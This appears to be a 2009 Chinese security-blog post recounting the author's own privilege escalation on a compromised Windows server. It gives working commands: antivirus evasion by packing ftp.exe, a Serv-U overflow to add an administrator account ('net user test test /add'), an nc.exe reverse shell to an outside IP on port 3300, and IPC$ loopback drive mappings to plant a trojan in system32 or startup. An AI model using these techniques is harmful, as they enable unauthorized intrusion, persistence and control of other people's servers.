专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » 服务器提权:小记一次服务器提权 »正文

服务器提权:小记一次服务器提权

来源: 发布时间:星期六, 2009年9月12日 浏览:9次 评论:0
我用是海洋2006,得到webshell后首先想到就是提权了呵呵

服务器各个目录权限设置得不错 ..

打开"WScript.Shell运行器"随便输入个命令提示:".. .. 拒绝访问,缺少对象"使用WS组件输入命令也提示:"拒绝访问"哎~~~ 看来有心啊..不过可以自己上传个cmd.exe玩玩...还好FSO没有删掉可以到处逛逛不过没什么用...

准备开始提权.gogo~~

从"系统服务信息"中得到对方有serv-u服务那就用溢出成功上传了cmd.exe,ftp.exe,新cmd.exe还在,ftp.exe消失了可以判断对方服务器中有杀毒软件Software,然后自己建了个空.bat文件把ftp.exe文件为主和此bat捆绑起来再加壳,(个人认为这样效果好) 生成另个ftp.exe然后上传新没有被杀直接执行ftp.exe "net user test test /add" 显示成功看来确实可以溢出汗 - -;;,正当得意时ftp.exe又被杀了不过用如上思路方法再次上传成功而且成功添加了管理员然后再次被杀!无所谓当时想可以用如上思路方法再次执行命令不过发现再也不能上传上传就马上被杀!可能杀毒软件Software变“精”了?上面得到了管理员用户通过2步自己都觉得纯属侥幸,有点戏剧性 ^_^

对方什么也没有开...3389,5631..ai..如果开此提权就已经结束还是需要自己开..但是上面所说溢出已经over....

查看"系统用户及用户组信息"突然发现里面有个asp.net用户哈哈希望我所在网站WebSite目录可以支持aspx,上传了aspx木马后随着状态栏点打开成功载入了aspx木马可以执行爽~~~此aspx具有users组用户权限也就是说可以执行般可执行文件.

上传nc.exe本地监听nc.exe -v -l -p 3300,aspx木马中执行nc.exe xxx.xxx.xxx.xxx 3300,进行反向连接于是本地成功获得了个具有users权限cmdshell

下来提权可是费了不少时间不过最后还是从net start里发现了有server服务想了想我在服务器中有管理员用户和密码
而且自己正在是服务器users组cmdshell中,
可不可以自己连接自己提权呢...

在cmdshell中输入net use \\127.0.0.1\ipc$ "test" /user:"test" 提示命令成功. 我晕..爽了..
服务器里只有2个盘,c:\和d:\
c:\为系统盘 d:\为网站WebSite所在盘
命令如下:
net use m: \\127.0.0.1\c$
net use n: \\127.0.0.1\d$
然后把木马上传到网站WebSite盘也就是说d:\ 那么就在n:\这个映射盘里

通过copy n:\web\xxx\xxx\木马.exe m:\winnt\system32\下面
也就是把D:\盘木马copy到了C:\盘下面
也可以copy到启动项中,想如何玩就如何玩.相于你来说c:\和d:\对你来说是everyone权限..
当时运气差了点没有计划任务没有启动,所以不能用at.exe定时执行....

可能有人要问为什么不在自己机器上直接连接服务器ipc$呢:)对方有防火墙根本连不上如果"自己连自己话"是没问题

好了提权告以段落这是2个月前事情了认为还比较有意思 :)
 
 




  • 篇文章: 推荐:截杀Session入后台拿Shell

  • 篇文章: 浅谈入侵后对硬件破坏思路方法
  • 0

    相关文章

    读者评论

    发表评论

    • 昵称:
    • 内容: